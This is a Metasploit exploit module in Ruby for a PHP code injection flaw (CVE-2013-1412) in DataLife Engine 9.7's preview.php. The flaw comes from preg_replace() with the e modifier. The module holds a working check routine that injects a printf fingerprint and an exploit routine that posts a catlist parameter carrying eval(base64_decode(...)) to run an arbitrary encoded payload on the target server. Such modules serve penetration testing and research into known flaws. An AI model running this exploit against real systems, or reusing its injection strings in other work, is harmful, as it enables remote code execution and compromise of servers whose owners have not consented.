##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DataLife Engine preview.php PHP Code Injection',
        'Description' => %q{
          This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
          The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
          with the e modifier, which allows to inject arbitrary php code, when there is a
          template installed which contains a [catlist] or [not-catlist] tag, even when the
          template isn't in use currently. The template can be configured with the TEMPLATE
          datastore option.
        },
        'Author' => [
          'EgiX', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-1412' ],
          [ 'OSVDB', '89662' ],
          [ 'EDB', '24438' ],
          [ 'BID', '57603' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
          [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
        ],
        'Privileged' => false,
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Payload' => {
          'Keys' => ['php']
        },
        'DisclosureDate' => '2013-01-28',
        'Targets' => [ ['DataLife Engine 9.7', {}], ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
        OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
      ]
    )
  end

  def uri
    normalize_uri(target_uri.path, 'engine', 'preview.php')
  end

  def send_injection(inj)
    res = send_request_cgi(
      {
        'uri' => uri,
        'method' => 'POST',
        'vars_post' =>
          {
            'catlist[0]' => inj
          },
        'cookie' => "dle_skin=#{datastore['TEMPLATE']}"
      }
    )
    res
  end

  def check
    fingerprint = rand_text_alpha(4 + rand(4))

    res = send_injection("#{rand_text_alpha(4 + rand(4))}')||printf(\"#{fingerprint}\");//")

    if res and res.code == 200 and res.body =~ /#{fingerprint}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Exploiting the preg_replace() to execute PHP code")
    res = send_injection("#{rand_text_alpha(4 + rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
  end
end
